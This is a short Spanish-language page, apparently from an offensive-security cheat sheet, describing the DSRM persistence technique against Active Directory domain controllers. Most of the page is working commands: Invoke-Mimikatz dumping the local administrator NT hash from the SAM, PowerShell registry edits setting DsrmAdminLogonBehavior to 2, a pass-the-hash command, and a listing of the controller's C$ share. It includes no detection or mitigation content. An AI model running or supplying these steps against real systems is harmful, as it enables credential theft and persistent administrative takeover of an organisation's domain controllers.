Directory Services Restore Mode (DSRM)

Descripción

Existe un administrador local en cada controlador de dominio, cuya contraseña corresponde a la ingresada en la opción de Directory Services Restore Mode (DSRM) al momento de instalar el servicio de Active Directory. Realizando una modificación al registro de Windows es posible activar dicha contraseña, para luego extraer su hash NT y acceder al controlador de dominio como administrador local utilizando Pass the Hash (PtH).

Invoke-Mimikatz

1) Obtención de hash NT del administrador local del controlador de dominio con Invoke-Mimikatz.

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername <computer-name-DC>

2) Configuración de registro DsrmAdminLogonBehavior con valor 2.

# Comprobación si existe registro DsrmAdminLogonBehavior
Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior

# Creación de registro DsrmAdminLogonBehavior y asignación de valor 2 si no existe
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD

# Actualización de valor del registro DsrmAdminLogonBehavior a 2 si ya existe
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2

Pass the Hash (PtH) a controlador de dominio con sesión de administrador local.

# Pass the Hash (PtH)
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:<computer-name-DC> /user:Administrator /ntlm:<NT-hash-computer-DC> /run:powershell.exe"'

# Lectura de archivos
dir \\<computer-name-DC>\C$
AnteriorSkeleton KeySiguienteNoPac

Última actualización